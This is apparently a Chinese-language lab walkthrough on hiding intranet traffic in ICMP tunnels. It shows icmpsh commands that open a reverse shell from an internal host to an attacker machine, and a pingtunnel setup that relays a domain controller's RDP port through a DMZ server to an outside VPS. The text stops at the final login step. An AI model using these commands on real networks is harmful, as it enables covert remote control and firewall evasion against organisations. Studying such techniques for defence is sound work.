内网-隐藏隧道通信技术,场景复现(ICMP隧道)

it2024-10-28  6

隐藏隧道通信技术(ICMP隧道)

一 icmpsh(跨平台) 环境: 外网攻击测试机,内网主机 下载工具: git clonehttps://github.com/inquisb/icmpsh.git 安装依赖包: apt-get install python-impacket 修改icmp通信方法: sysctl -w net.ipv4.icmp_echo_ignore_all=1 外网攻击测试机: ./icmpsh_m.py ip(攻击) ip(目标) //等待反弹shell 内网主机: icmpsh.exe -t i p(攻击) -d 500 -b 30 -s 128

二 pingtunnel(跨平台,可设置密码) 2.1 实验环境 软件防火墙: VM配置:双网卡:桥接+仅主机 monowall 10.1.1.1/192.168.1.10 公网vps: VM配置:桥接 kali2020 192.168.1.13 攻击者PC: VM配置:桥接 windows7 192.168.1.2 DMZ区服务器: VM配置:双网卡 仅主机+桥接 kali2020 192.168.1.4/10.1.1.5 内网PC: VM配置:仅主机 windows2012 10.1.1.2(DC) 2.2 简单拓扑

2.3 功能实现 通过ICMP协议,使攻击者能直接控制内网PC 2.4 过程复现 A vps和dmz区服务器安装pingtunnel工具 1.下载https://github.com/lnslbrty/ptunnel-ng 2.安装编译 tar xf PingTunnel-0.72.tar.gz cd PingTunnel make && make install 可能遇到的错误 缺少pcap.h wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz tar zxvf libpcap-1.9.0.tar.gz cd libpcap-1.9.0 ./configure yacc包错误 Sudo apt-get install –y byacc ./configure make sudo make install B 在dmz区服务器开启监听 ptunnel -x shuteer //-x shuteer 设置密码为shuteer

C 在vps开启监听 ptunnel -p 192.168.1.4 -lp 1080 -da 10.1.1.2 -dp 3389 -x shuteer //在vps本地的1080端口监听dmz区服务器icmp的流量,并转发到内网主机的3389端口

参数说明: -x 指定 icmp 隧道连接验证密码 -lp 指定要监听的本地 tcp 端口 -da 指定要转发到的机器的 ip 地址 -dp 指定要转发到的机器的 tcp 端口 -p 指定icmp隧道另一端机器的 ip 地址 D 在攻击者PC 连接vps服务器的1080端口,并登录:

最新回复(0)